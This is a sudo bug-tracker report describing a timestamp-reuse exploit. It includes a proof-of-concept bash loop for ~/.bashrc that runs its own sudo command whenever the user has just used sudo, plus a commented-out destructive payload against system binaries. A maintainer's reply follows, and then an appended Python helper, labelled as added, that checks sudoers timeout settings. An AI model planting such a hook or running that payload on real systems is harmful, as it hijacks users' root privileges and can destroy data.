Bugzilla – Bug 377
Timestamp exploit by programmatically launching another sudo command shortly after.
Last modified: 2009-12-08 10:27:53 MST
The timestamp capability of sudo, as shipped with Ubuntu by default, can be exploited to execute another command after the user starts his/her own command. Consider appending the following script to ~/.bashrc: It waits for the user to launch a sudo-enhanced program. (This obviously also works if NOPASSWD is set for the user.)

    # this exploits sudo's timeout capability by launching another command when
    # the user did some sudo command shortly before.
    MAXAGE=100
    while sleep 10
    do
      pgrep -f -U 0 -P $PPID,$$ && {
        echo parent has a root owned child process
        id=$(pgrep -f -U 0 -P $PPID,$$ | head -n1)
        # wait $id
        age=$(($(date +%s) - $(stat /proc/$id/ -c '%Y')))
        if [ "$age" -lt "$MAXAGE" ]; then
          echo the child is young
          # launch next stage payload
          # sudo chown -x /bin/* /sbin/*
          sudo id
        fi
      }
    done &

Note that any program can reach root by waiting for the user to launch any sudo command. Ideally, sudo (or PolicyKit) should be able to tell whether the command came from the keyboard, or a program. This, however, is not possible. A workaround is to disable timestamps.

This might be related to http://www.sudo.ws/bugs/show_bug.cgi?id=357

What measures can be taken to mitigate this? Would you consider this a security bug, or the normal behaviour of sudo? What should distros/users do about it?
This is normal sudo behavior. Sites that wish to disable the timestamps may do so. The point of the timestamp file is to provide a middle ground between the convenience of using a root shell and the security of requiring a password for each root command. If someone is able to write to your .bashrc your account is effectively compromised as it is possible to invoke a keylogger to read the password used for sudo (or anything else). As such, I don't think this is a sudo-specific problem.
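Both comments point at the same knob: the lifetime of the cached timestamp. The following audit helper is an added example, not code from this bug report or from the sudo project; it reads a sudoers text, applies the global Defaults lines in order as sudo does, and reports the effective timestamp_timeout (0 means a password on every invocation, so the window the reporter's script waits for does not exist). The 15-minute fallback is an assumption about the compile-time default, which distributions may change.

```python
import re

# Assumed compile-time default used when sudoers sets nothing; distributions
# may build with a different value (`sudo -V` as root prints the active one).
DEFAULT_TIMEOUT_MINUTES = 15.0

# Global "Defaults" lines only; the scoped forms (Defaults:user, Defaults@host,
# Defaults>runas, Defaults!cmd) apply to a subset of invocations and are skipped.
_GLOBAL_DEFAULTS = re.compile(r"^\s*Defaults\s+(.*)$")
_TIMEOUT_OPTION = re.compile(r'^timestamp_timeout\s*=\s*"?(-?\d+(?:\.\d+)?)"?$')


def effective_timestamp_timeout(sudoers_text: str) -> float:
    """Credential-cache lifetime in minutes implied by the global Defaults.

    Later lines override earlier ones. A negative value means the cached
    timestamp never expires; 0 means sudo asks for the password every time.
    Backslash continuation lines are joined before parsing.
    """
    joined = sudoers_text.replace("\\\n", "")
    timeout = DEFAULT_TIMEOUT_MINUTES
    for line in joined.splitlines():
        line = line.split("#", 1)[0]  # drop trailing comments
        m = _GLOBAL_DEFAULTS.match(line)
        if not m:
            continue
        for option in (o.strip() for o in m.group(1).split(",")):
            t = _TIMEOUT_OPTION.match(option)
            if t:
                timeout = float(t.group(1))
    return timeout


def replay_window_open(sudoers_text: str) -> bool:
    """True when a later sudo run in the same session can reuse the cached
    credential, i.e. the situation described in this bug is possible."""
    return effective_timestamp_timeout(sudoers_text) != 0


# Constructed sample policies: a stock-looking file and a hardened one.
SAMPLE_DEFAULT = "Defaults env_reset\nroot ALL=(ALL) ALL\n"
SAMPLE_HARDENED = "Defaults env_reset, \\\n    timestamp_timeout=0  # prompt every time\n"
```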